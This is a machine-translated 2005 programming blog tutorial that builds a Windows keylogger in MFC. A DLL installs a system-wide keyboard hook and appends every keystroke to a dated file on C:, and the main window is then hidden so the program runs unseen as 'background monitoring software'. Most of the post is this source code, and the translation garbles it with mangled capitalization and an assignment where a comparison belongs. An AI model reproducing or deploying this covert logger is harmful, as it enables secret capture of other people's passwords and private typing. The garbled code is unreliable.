Source: http://blog.csdn.net/jaminwm/archive/2005/08/24/463940.aspx
Record the first hook program that has been debugged for future use. We would also like to thank the bloggers for their spirit of sharing.
I. We can easily capture keyboard operations performed in the program window in the application, but if we want to make this program a monitor program, the global hook is used to capture keyboard operations in any windows on Windows.
Ii. System hooks and DLL
The essence of a hook is a program used to process system messages. It is called by the system and mounted to the system. There are many types of hooks. Each Hook can intercept and process corresponding messages. Each time a specific message is sent, the hook program intercepts the message first to gain control of the message. In this case, you can process the intercepted messages in the hook function, or even forcibly end the message transmission.
In this program, we need to capture keyboard input in any window, which requires a global hook to intercept messages of the entire system, and the global hook function must use DLL (Dynamic Connection Library) for Carrier encapsulation, there are three forms of mfc dll available in vc6, namely regular statically linked to mfc dll (Standard static link mfc dll), regular using the shared mfc dll (Standard Dynamic Link mfc dll) and extension mfc dll (Extended mfc dll ). In this program, the standard static connection mfc dll is used for convenience.
3. Example of a keyboard hook Program
The global hook function is used in this example. The program consists of the executable program keyhook and the dynamic Connection Library launchdll.
1. First, compile the MFC extended dynamic Connection Library launchdll. dll:
(1) Select MFC Appwizard (DLL) to create the launchdll project. In the following options, select regular statically linked to mfc dll (Standard static link mfc dll ).
(2) Add the macro definition and declaration of the function to be exported in launchdll. h:
# Define dllexport _ declspec (dllexport)
......
Dllexport void winapi installlaunchev ();
......
Class claunchdllapp: Public cwinapp
{
Public:
Claunchdllapp ();
// {Afx_virtual (claunchdllapp)
//} Afx_virtual
// {Afx_msg (claunchdllapp)
// Note-The classwizard will add and remove member functions here.
// Do not edit what you see in these blocks of generated code!
//} Afx_msg
Declare_message_map ()
};
(3) Add the global variables hook and global functions launcherhook and savelog to launchdll. cpp:
Hhook hook;
Lresult callback launcherhook (INT ncode, wparam, lparam );
Void savelog (char * C );
(4) complete the implementation of the functions mentioned above:
......
Claunchdllapp theapp;
......
Dllexport void winapi installlaunchev ()
{
Hook = (hhook) setwindowshookex (wh_keyboard,
(Hookproc) launcherhook,
Theapp. m_hinstance,
0 );
}
Here we have implemented the installation of Windows System hooks. First, we need to call the API function setwindowshookex In the SDK to install this hook function. Its prototype is:
Hhook setwindowshookex (INT idhook,
Hookproc lpfn,
Hinstance hmod,
DWORD dwthreadid );
Among them, the first parameter specifies the hook type, commonly used wh_mouse, wh_keyboard, wh_getmessage, etc. Here we only care about keyboard operations, so we set it to wh_keyboard; the second parameter identifies the entry address of the hook function. When the hook hooks any message, the function is called. That is, the launcherhook action is triggered immediately when any keyboard input in the System window is present; the third parameter is the handle of the module where the hook function is located. We can easily set it as the instance handle of this application; the last parameter is the ID of the hook-related function used to specify the thread to which the hook is to hook. If the value is 0, messages of the entire system are intercepted. In this program, the hook must be a global hook, therefore, it is set to 0.
......
Lresult callback launcherhook (INT ncode, wparam, lparam)
{
Lresult result = callnexthookex (Hook, ncode, wparam, lparam );
If (ncode = hc_action)
{
If (lparam & 0x80000000)
{
Char C [1];
C [0] = wparam;
Savelog (C );
}
}
Return result;
}
Although callnexthookex () is optional, it is recommended to call this function. Otherwise, other apps with hooks installed will not receive hook notifications and may produce incorrect results. Therefore, we should try to call this function unless it is absolutely necessary to prevent other programs from getting notifications.
......
Void savelog (char * C)
{
Ctime TM = ctime: getcurrenttime ();
Cstring name;
Name. Format ("C: // key _ % d. log", TM. getmonth (), TM. getday ());
Cfile file;
If (! File. Open (name, cfile: modereadwrite ))
{
File. Open (name, cfile: modecreate | cfile: modereadwrite );
}
File. seektoend ();
File. Write (C, 1 );
File. Close ();
}
When a key pops up, this function is used to save the key that just pops up to the record file to monitor the keyboard.
After compilation, you can obtain the dynamic Connection Library launchdll. dll and launchdll. Lib used for static link for the keyboard hook required for running.
2. Write the main program that calls the dynamic Connection Library and implement the final integration:
(1) Use the Appwizard (exe) of MFC to create the project keyhook;
(2) Select a single document and save the remaining steps;
(3) Copy launchdll. h and launchdll. lib to the keyhook project directory, and copy launchdll. DLL to the DEBUG directory.
(4) link the dll library in "project", "Settings... On the "Link" property page of "Object/librarymodules:", enter "launchdll. lib "(in the Chinese version of vc2005, the location is: configuration properties-> linker-> input-> additional dependency. I did not find this place. I found it only after giving instructions. I will make a special note .). Use "project", "add to Project", "files... "Add launchdll. H to the project, and add reference to the source file keyhook. cpp of the video class:
# Include "launchdll. H"
In this way, we can use all the export functions in the dynamic Connection Library launchdll. dll just like using functions in this project.
(5) Add the virtual function oninitialupdate () to the video class and add the code to install the keyboard HOOK:
......
Installlaunchev ();
......
(6) All functions have been completed so far. However, as a background monitoring software, the runtime does not require an interface. You can use ckeyhookapp's initinstance () in the function, change m_pmainwnd-> showwindow (sw_show); To m_pmainwnd-> showwindow (sw_hide.
Iv. Operation and Detection
Compile and run the program. After it is run, the program "keyhook" We just compiled can be found in the close program dialog box through Alt + Ctrl + Del ", enter characters on the keyboard in any program and open the record file. We will find that all the characters we just entered are recorded in the record file through the keyboard hook.
Summary: System Hooks have powerful functions. This technology can intercept, monitor, and process messages in almost all Windows systems. This technology is widely used in various automatic monitoring systems.